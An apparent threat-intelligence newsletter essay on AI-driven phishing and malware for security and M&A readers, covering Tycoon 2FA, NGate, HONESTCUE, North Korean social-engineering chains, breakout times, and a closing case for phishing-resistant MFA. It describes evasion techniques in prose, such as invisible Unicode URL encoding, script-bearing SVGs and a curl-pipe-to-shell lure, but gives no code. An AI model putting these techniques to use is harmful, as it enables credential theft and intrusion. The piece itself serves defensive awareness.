The Attacker's Productivity Revolution
In November 2024, AI-generated phishing emails were 10% less effective than those written by elite human social engineers. Four months later, in March 2025, they were 24% more effective.
That crossover happened faster than almost anyone predicted. It also happened quietly no press release, no industry announcement, no regulatory response. The Hoxhunt longitudinal study that documented it was read carefully by security researchers and largely ignored by everyone else.
The attackers noticed.
The Platform Economy of Cybercrime
Tycoon 2FA is not a hacking group. It is a subscription service.
For approximately $120 per ten days, any buyer regardless of technical skill gets access to a phishing platform with Microsoft 365 and Gmail bypass built in as a feature. The platform handles the infrastructure, the evasion layer, the credential harvesting, and the session token capture that defeats multi-factor authentication after the victim has already logged in. The buyer supplies the target list and collects the results.
By mid-2025, Tycoon 2FA accounted for 62% of all phishing attempts blocked by Microsoft more than 30 million malicious emails in a single month. The platform was linked to an estimated 96,000 distinct victims worldwide since 2023, including more than 55,000 Microsoft customers. A global coalition led by Microsoft and Europol seized 330 domains powering the platform’s infrastructure in March 2026 and filed a civil complaint against alleged creator Saad Fridi demanding a $10 million injunction.
The takedown happened after the damage was done. The platform operated for years. A financial services firm breached in early 2025 employees received convincing phishing emails impersonating internal departments, entered credentials and MFA codes into near-identical Microsoft login portals, and watched attackers exfiltrate sensitive client data using authenticated sessions that bypassed every subsequent security check was one of thousands of victims who never saw law enforcement intervention in time to matter.
The lesson is not that law enforcement eventually acts. It is that the attacker productivity revolution had already run its course before anyone moved to stop it.
Why Your Technical Controls Are Failing
The instinct in most organizations is to treat phishing as a human awareness problem. Train the employees. Run simulations. Remind people not to click suspicious links.
That framing is now structurally inadequate, and the technical data explains why.
AI-generated phishing content surged from less than 5% of monthly phishing attempts to 56% between 2025 and early 2026 — a fourteen-fold increase in roughly eighteen months. Per Crowe’s January 2026 testing, AI-generated phishing emails produced a false negative rate of 78% in traditional email gateways, compared to 32% for human-written samples. The content is syntactically correct, contextually appropriate, grammatically perfect, and personally relevant in ways that rule-based filters were never designed to detect.
The evasion mechanisms are specific and worth understanding. Tycoon 2FA’s 2025 version introduced Hangul Filler characters invisible Unicode elements to encode malicious URLs in ways that bypass signature-based detection. Seventy-seven percent of phishing domains now carry valid SSL certificates, defeating certificate-based filtering. Dynamic short links ensure each URL is used once, preventing blacklist accumulation. Polymorphic PDF attachments carry the same semantic content with different binary fingerprints each time, defeating hash-based detection.
The newest vectors don’t use links or attachments at all. The ATHR platform sold for $4,000 plus 10% of attacker profits sends emails containing only a phone number. When a victim calls, they reach either a human operator or an AI voice agent following a structured script designed to extract verification codes. Traditional secure email gateways were never built to detect a phone number as a threat vector. Malicious calendar invites embedded in ICS files bypass the SMTP filter layer entirely and write directly to calendar applications, with a victim click rate six times higher than baseline phishing.
SVG files XML-based text files that can contain JavaScript have become the third most popular malicious attachment type specifically because email security tools scan them less aggressively than executables. When previewed in an email client, embedded scripts execute and trigger redirects or malware downloads without the victim opening a traditional attachment.
The technical arms race has moved decisively in the attacker’s direction. The controls most organizations rely on were designed for a threat landscape that no longer exists.
The Democratization of Nation-State Capability
Until recently, the sophistication gap between organized criminal groups and nation-state threat actors was meaningful. Nation-states had resources, patience, and technical depth that criminal operators couldn’t match. That gap is closing faster than most security teams have adjusted for.
The NGate malware, discovered by ESET Research in April 2026, trojanizes the legitimate Android HandyPay application to relay NFC data from victims’ payment cards to attacker devices, enabling contactless ATM cash-outs and PIN capture. The malicious code shows signs of AI-generated authorship specifically, the malware logs contain an emoji characteristic of AI-generated text output. The attackers chose to build custom malware rather than pay $400 to $500 per month for existing Malware-as-a-Service kits. With AI, the development cost dropped to near zero.
The HONESTCUE malware, identified by Google’s Threat Intelligence Group in September 2025, calls Gemini’s API during execution and receives C# source code as the response, then downloads and executes the next-stage payload. The malware generates small iterative variations across samples, suggesting attackers testing antivirus detection in near real-time. Traditional signature-based detection cannot keep pace with a malware family that rewrites itself on demand using a commercial AI API.
These are not isolated incidents. Google’s February 2026 threat intelligence report documented confirmed AI tool use by APT42 (Iran), UNC2970 (North Korea), and TEMP.Hex (China) across reconnaissance, persona development, phishing kit generation, and vulnerability research. APT42 uses Gemini to search for target email addresses, generate cultural context for phishing lures, and craft targeted personas. UNC2970 synthesizes OSINT on defense contractor employees, mapping job roles and salary data to identify high-value targets. TEMP.Hex compiles detailed profiles on specific individuals and uses AI-generated personas to trial security bypass techniques.
Per my practice running OSINT-based investigations for M&A clients: the tools nation-state actors are using for targeting are the same tools legitimate investigators use for due diligence. The difference is authorization and intent, not capability. That parity is new, and it is consequential.
What 29 Minutes Actually Means
CrowdStrike’s 2026 Global Threat Report documents an average eCrime breakout time of 29 minutes — the window between initial access and lateral movement into the broader network. The fastest observed breakout was 27 seconds. Data exfiltration began within four minutes of initial access in one documented intrusion.
These numbers define the defender’s operational window. An attacker who obtains valid credentials through a Tycoon 2FA session — which captures both the password and the authenticated session token simultaneously — can be moving laterally through a corporate network before most security operations centers have processed the initial alert.
The financial services sector, which is directly relevant to your M&A and CISO readership, faces a compounded version of this problem. Average breach cost in financial services runs $6.08 million per incident, the highest of any industry. AI-related breaches average $14.6 million — more than triple the baseline. Seventy-six percent of U.S. financial firms reported payments fraud in 2025, with AI-assisted attacks contributing significantly to the volume.
UNC1069, a North Korean nexus threat actor investigated by Mandiant, targeted a fintech entity in the cryptocurrency sector using a sequence that illustrates how these capabilities combine in practice. The victim was contacted via a compromised Telegram account belonging to a cryptocurrency executive. Rapport was established over time, then a Calendly link for a meeting directed the victim to attacker-controlled infrastructure. On the call, the victim was presented with a deepfake video of a CEO from another cryptocurrency company. The “audio issues” that followed prompted the victim to run troubleshooting commands containing a curl pipe to shell — initiating infection. Seven distinct malware families were deployed on a single host. DEEPBREATH, a Swift-based payload, then manipulated the TCC database to harvest Keychain credentials, browser data, Telegram data, and Apple Notes. A malicious browser extension masquerading as a Google Docs offline editor recorded keystrokes and extracted cookies.
This is not exceptional. This is documented operational practice by a mid-tier nation-state actor, using commercially available AI tools, against a target in a sector your clients operate in.
The Question Your Controls Need to Answer
The attacker’s productivity revolution is not a future threat. It arrived in 2025 and the data documents its operational impact precisely.
The organizations facing the greatest exposure are those whose security posture was calibrated for the 2022 threat landscape: rule-based email filtering, single-factor or SMS-based MFA, signature detection for malware, and employee awareness training as the primary phishing defense. Each of those controls has been structurally degraded by the AI productivity shift documented above.
Phishing-resistant MFA — FIDO2 and WebAuthn implementations that cannot be captured by adversary-in-the-middle proxies is the minimum credential protection baseline for 2026, not an advanced security measure. Organizations still relying on SMS or push-notification MFA are operating with a known bypass available on a $120 ten-day subscription.
Per my experience conducting pre-acquisition security assessments: the credential exposure question is now the first question, not a secondary check. Seventy-nine percent of successful intrusions use valid credentials as the entry point. The secondary market for those credentials, as we examined in an earlier piece in this series, ensures that a breach from 2022 is still generating usable access in 2026.
The attacker has a productivity advantage. The question is whether your organization has closed enough of the gap to make the attack economically unattractive relative to softer targets.
At 29 minutes average breakout time, the answer to that question is determined before most security teams know there is a question to answer.
Next in The Familiar Fire: The $25 Million Meeting — the Arup heist documented how a video call full of deepfake participants cost $25 million. In 2026, the attacks have evolved from video calls to data rooms. AI-generated due diligence documents are already passing initial review.